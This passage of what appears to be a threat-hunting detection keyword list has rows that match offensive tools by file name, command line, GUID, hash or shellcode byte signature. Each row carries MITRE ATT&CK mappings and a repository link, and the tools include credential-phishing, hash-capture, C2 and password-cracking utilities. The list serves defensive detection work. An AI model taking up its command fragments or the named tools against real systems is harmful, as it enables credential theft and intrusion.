tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*FakeDriver.java*",".{0,1000}FakeDriver\.java.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*FakeDriver2.java*",".{0,1000}FakeDriver2\.java.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*fakefuse.c*",".{0,1000}fakefuse\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","363","58","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*fakefuse.h*",".{0,1000}fakefuse\.h.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","363","58","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*FakeImageExploiter*",".{0,1000}FakeImageExploiter.{0,1000}","offensive_tool_keyword","FakeImageExploiter","This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them.","T1564 - T1218 - T1204 - T1558.001","TA0002 - TA0008 - TA0010","N/A","N/A","Phishing","https://github.com/r00t-3xp10it/FakeImageExploiter","1","1","N/A","N/A","9","875","343","2019-12-06T20:59:26Z","2017-04-04T20:53:47Z" "*fakelogonscreen *",".{0,1000}fakelogonscreen\s.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*fakelogonscreen*.zip*",".{0,1000}fakelogonscreen.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*FakeLogonScreen.csproj*",".{0,1000}FakeLogonScreen\.csproj.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*fakelogonscreen.exe*",".{0,1000}fakelogonscreen\.exe.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*FakeLogonScreen.sln*",".{0,1000}FakeLogonScreen\.sln.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*fakepath31337*",".{0,1000}fakepath31337.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*FakePPID.*",".{0,1000}FakePPID\..{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*fake-sms-main*",".{0,1000}fake\-sms\-main.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2663","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*faketime '202* zsh*",".{0,1000}faketime\s\'202.{0,1000}\szsh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*FalconForceTeam/SOAPHound*",".{0,1000}FalconForceTeam\/SOAPHound.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*farmer.exe *\windows\temp*",".{0,1000}farmer\.exe\s.{0,1000}\\windows\\temp.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*farmer.exe 8888 60*",".{0,1000}farmer\.exe\s8888\s60.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*Farmer\Farmer.csproj*",".{0,1000}Farmer\\Farmer\.csproj.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*Farmer-main.zip*",".{0,1000}Farmer\-main\.zip.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*fastfuz-chrome-ext*files.txt*",".{0,1000}fastfuz\-chrome\-ext.{0,1000}files\.txt.{0,1000}","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","1","25","3","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z" "*FastjsonScan.jar*",".{0,1000}FastjsonScan\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*fasttrack/wordlist.txt*",".{0,1000}fasttrack\/wordlist\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*favfreak-http*",".{0,1000}favfreak\-http.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*FB351327-0816-448B-8FB7-63B550D6C808*",".{0,1000}FB351327\-0816\-448B\-8FB7\-63B550D6C808.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","0","N/A","7","2","114","22","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z" "*fb4a9c6269ea58b893c6978105fd3e2b2bc6e72e24715c1824b45f40c87b850d*",".{0,1000}fb4a9c6269ea58b893c6978105fd3e2b2bc6e72e24715c1824b45f40c87b850d.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*fb6a2914759e6644c5067b1b7308bc295d4b6b357b1ad9f904b430ba588654f8*",".{0,1000}fb6a2914759e6644c5067b1b7308bc295d4b6b357b1ad9f904b430ba588654f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fb808cc0dbbe0b6cd1a58631befb038483fc3043175232cf7d5f9a0d29b31895*",".{0,1000}fb808cc0dbbe0b6cd1a58631befb038483fc3043175232cf7d5f9a0d29b31895.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*",".{0,1000}fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*fb8c1454ea22ccc9d97cbd90692d38c3c63d551680f6632fe658598a9bb23c03*",".{0,1000}fb8c1454ea22ccc9d97cbd90692d38c3c63d551680f6632fe658598a9bb23c03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fbb4a1a49a0683247e83da8d2ccd4bdab51516a0a5cacbf6ff759213792e58e2*",".{0,1000}fbb4a1a49a0683247e83da8d2ccd4bdab51516a0a5cacbf6ff759213792e58e2.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*fbbc07b9b6d448c80d5bb8a086d715631b78e30eb10cb850601317b21256fb8d*",".{0,1000}fbbc07b9b6d448c80d5bb8a086d715631b78e30eb10cb850601317b21256fb8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fbcbcfae5662f9f0dfbf7f5cb31c052399382232a51554197f4554d1bb06332f*",".{0,1000}fbcbcfae5662f9f0dfbf7f5cb31c052399382232a51554197f4554d1bb06332f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fbd415807cca02732e2b7b7ad2d8fd09db1ab75953fe24fe7b6238f691c6e5a8*",".{0,1000}fbd415807cca02732e2b7b7ad2d8fd09db1ab75953fe24fe7b6238f691c6e5a8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*FC 48 83 E4 F0 E8 CC 00 00 00 41 51 41 50 52 48 31 D2 51 65 48 8B 52 60 48 8B 52 18 48 8B 52 20*",".{0,1000}FC\s48\s83\sE4\sF0\sE8\sCC\s00\s00\s00\s41\s51\s41\s50\s52\s48\s31\sD2\s51\s65\s48\s8B\s52\s60\s48\s8B\s52\s18\s48\s8B\s52\s20.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","#yara rule","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*fc04cd7b616aa8a43a35a5318a9454f4228c74b056bfa07ec14105d249593e35*",".{0,1000}fc04cd7b616aa8a43a35a5318a9454f4228c74b056bfa07ec14105d249593e35.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fc1ca88117a5a0328991e63be9340c949d22a25f53134d04c1ffc7be2ed69e6a*",".{0,1000}fc1ca88117a5a0328991e63be9340c949d22a25f53134d04c1ffc7be2ed69e6a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fc52dac4f484c090d99d8b142ed41ed3368938955dfc25d76cd4f290bb6c59d5*",".{0,1000}fc52dac4f484c090d99d8b142ed41ed3368938955dfc25d76cd4f290bb6c59d5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*FC5A1C5A-65B4-452A-AA4E-E6DCF1FA04FB*",".{0,1000}FC5A1C5A\-65B4\-452A\-AA4E\-E6DCF1FA04FB.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*fc5d03fa8fedd73efabd7066cfc4bbeb4777788c8a88301a5a27011239c6f994*",".{0,1000}fc5d03fa8fedd73efabd7066cfc4bbeb4777788c8a88301a5a27011239c6f994.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fc62634b7cdf7a2397165512a48feafc25c2f1e80d7579dfca7e8a773c58a5c3*",".{0,1000}fc62634b7cdf7a2397165512a48feafc25c2f1e80d7579dfca7e8a773c58a5c3.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*fc8516a68f470a92e9e4dd80b5928ddd732d2de4b43b483d23d068bb92509f0c*",".{0,1000}fc8516a68f470a92e9e4dd80b5928ddd732d2de4b43b483d23d068bb92509f0c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fc959cac98096ae179061a564cdce68687a17768f90ec9af568a5b58c0adfb5a*",".{0,1000}fc959cac98096ae179061a564cdce68687a17768f90ec9af568a5b58c0adfb5a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fc9b91ba161b6dcf81cee6713bbf224e82c49e3166178c0d9ceb54f963250ce7*",".{0,1000}fc9b91ba161b6dcf81cee6713bbf224e82c49e3166178c0d9ceb54f963250ce7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fcc29a4c87c77c17f93c5b4703d34a4d94ee2f6b66dc149e539978c7cb4924ac*",".{0,1000}fcc29a4c87c77c17f93c5b4703d34a4d94ee2f6b66dc149e539978c7cb4924ac.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*FCD5E13D-1663-4226-8280-1C6A97933AB7*",".{0,1000}FCD5E13D\-1663\-4226\-8280\-1C6A97933AB7.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*fcda7875e75e4d74879ad122a5861477e30c825cb90aceb76ac885cc2eb7e6dc*",".{0,1000}fcda7875e75e4d74879ad122a5861477e30c825cb90aceb76ac885cc2eb7e6dc.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*fcrackzip *",".{0,1000}fcrackzip\s.{0,1000}","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fcrackzip *",".{0,1000}fcrackzip\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*fcrackzip -u -v -D -p *.zip*",".{0,1000}fcrackzip\s\-u\s\-v\s\-D\s\-p\s.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*fd04fd7f9fcc43cca1aca5ec9050e6f7229decc563b2e31c8d0af385d425980e*",".{0,1000}fd04fd7f9fcc43cca1aca5ec9050e6f7229decc563b2e31c8d0af385d425980e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fd0571eeb3d23326429a47df6b1104383efca78191f36099897ec29e5a4da50e*",".{0,1000}fd0571eeb3d23326429a47df6b1104383efca78191f36099897ec29e5a4da50e.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of 